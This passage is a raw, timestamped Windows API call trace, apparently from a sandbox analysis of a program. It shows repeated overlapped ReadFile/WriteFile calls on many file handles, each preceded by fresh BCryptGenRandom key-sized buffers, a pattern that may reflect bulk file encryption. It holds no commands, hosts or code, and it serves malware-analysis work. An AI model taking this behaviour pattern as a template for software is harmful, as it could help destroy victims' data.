lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.232] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.233] CloseHandle (hObject=0x3cc) returned 1 [0142.233] free (_Block=0x1ff1e60) [0142.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0142.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.245] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0142.245] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.245] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.245] free (_Block=0x3e305b8) [0142.245] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.245] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.245] free (_Block=0x1fa91d0) [0142.245] free (_Block=0x77d7a8) [0142.245] free (_Block=0x1fa90b8) [0142.245] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0142.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.249] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.249] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.256] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0142.256] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0142.256] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.257] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.257] free (_Block=0x3e305b8) [0142.257] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.257] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.257] free (_Block=0x1fa91d0) [0142.257] free (_Block=0x77d7a8) [0142.257] free (_Block=0x1fa90b8) [0142.257] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.797] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.798] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0142.798] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.799] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0142.799] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.799] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.799] free (_Block=0x3e305b8) [0142.799] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.799] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.800] free (_Block=0x1fa91d0) [0142.800] free (_Block=0x77d7a8) [0142.800] free (_Block=0x1fa90b8) [0142.800] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0142.800] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.813] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.813] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0142.813] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.814] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0142.814] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.814] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.814] free (_Block=0x3e305b8) [0142.814] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.814] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.815] free (_Block=0x1fa91d0) [0142.815] free (_Block=0x77d7a8) [0142.815] free (_Block=0x1fa90b8) [0142.815] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.815] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.877] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x126c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0142.886] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0143.834] CloseHandle (hObject=0x308) returned 1 [0143.834] free (_Block=0x1ff1e60) [0143.834] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0143.835] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x84b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0143.835] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0144.739] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0144.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0144.754] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x18c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0144.774] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x1884, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0144.788] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0144.801] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.802] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0144.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0144.803] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.803] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.803] free (_Block=0x3e305b8) [0144.803] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.803] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.804] free (_Block=0x1fa91d0) [0144.804] free (_Block=0x1fa2ed8) [0144.804] free (_Block=0x1fa90b8) [0144.804] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0144.804] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0144.815] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0144.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.817] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0144.817] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.817] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.817] free (_Block=0x3e305b8) [0144.817] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.817] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.818] free (_Block=0x1fa91d0) [0144.818] free (_Block=0x1fa2ed8) [0144.818] free (_Block=0x1fa90b8) [0144.818] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.818] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0144.822] CloseHandle (hObject=0x170) returned 1 [0144.822] free (_Block=0x1ff1e60) [0144.822] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0144.823] CloseHandle (hObject=0x2a8) returned 1 [0144.823] free (_Block=0x3d70450) [0144.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0144.823] CloseHandle (hObject=0x2a4) returned 1 [0144.823] free (_Block=0x3df0008) [0144.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0145.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0145.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0145.912] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0145.913] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0145.913] free (_Block=0x3e305b8) [0145.913] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0145.913] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0145.913] free (_Block=0x1fa91d0) [0145.913] free (_Block=0x1fa2ed8) [0145.913] free (_Block=0x1fa90b8) [0145.913] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0145.914] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0145.927] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.928] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0145.928] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.928] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0145.928] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0145.929] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0145.929] free (_Block=0x3e305b8) [0145.929] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0145.929] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0145.929] free (_Block=0x1fa91d0) [0145.929] free (_Block=0x1fa2ed8) [0145.929] free (_Block=0x1fa90b8) [0145.930] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0145.930] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0145.938] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.939] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0145.939] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.939] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0145.940] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0145.940] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0145.940] free (_Block=0x3e305b8) [0145.940] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0145.940] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0145.940] free (_Block=0x1fa91d0) [0145.940] free (_Block=0x1fa2ed8) [0145.940] free (_Block=0x1fa90b8) [0145.940] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0145.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0145.950] CloseHandle (hObject=0x2a4) returned 1 [0145.950] free (_Block=0x3df0008) [0145.950] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0145.962] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x8774, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0145.971] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0145.978] WriteFile (in: hFile=0x3cc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0145.978] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0145.988] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0145.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0145.996] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1c98, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.002] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.010] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0146.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.035] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0146.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.158] CloseHandle (hObject=0x170) returned 1 [0146.158] free (_Block=0x3df0008) [0146.158] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.173] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3a28, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0146.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.234] CloseHandle (hObject=0x2a8) returned 1 [0146.234] free (_Block=0x1ff1e60) [0146.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.235] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x29b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0146.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.782] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4e80, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.784] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.794] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x8f0c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | 